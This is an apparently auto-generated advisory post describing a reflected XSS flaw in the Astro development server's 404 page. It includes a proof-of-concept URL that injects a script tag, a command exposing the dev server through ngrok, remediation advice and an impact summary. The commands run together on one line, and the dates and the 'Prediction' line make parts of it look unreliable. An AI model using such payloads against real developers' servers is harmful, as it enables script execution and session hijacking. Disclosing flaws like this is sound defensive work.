Listen to this Post
The vulnerability exists in the Astro development server’s 404 error page for trailing slash mismatches. The `corrected` variable, derived from the user-controlled URL pathname, is inserted into the HTML without sanitization. While the original `pathname` is escaped, the `corrected` version is not. This allows an attacker to craft a URL containing a malicious script. When a developer with a misconfigured trailing slash visits this URL, the server returns a 404 page that unsafely interpolates the payload, causing script execution in the developer’s browser context.
Platform: Astro
Version: <5.16.0
Vulnerability: Reflected XSS
Severity: Medium
date: 2024-12-18
Prediction: Patch 2024-12-20
What Undercode Say:
npm run dev ngrok http 3000
// astro.config.mjs trailingSlash: 'never', // Malicious URL http://localhost:3000/"></script><script>alert(1)</script><!--
How Exploit:
Craft malicious URL with XSS payload targeting the `corrected` variable in the 404 page.
Protection from this CVE
Update Astro to version >=5.16.0. Do not expose the development server to untrusted networks.
Impact:
Arbitrary JavaScript execution in developer’s browser, potential session hijacking, local network probing.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
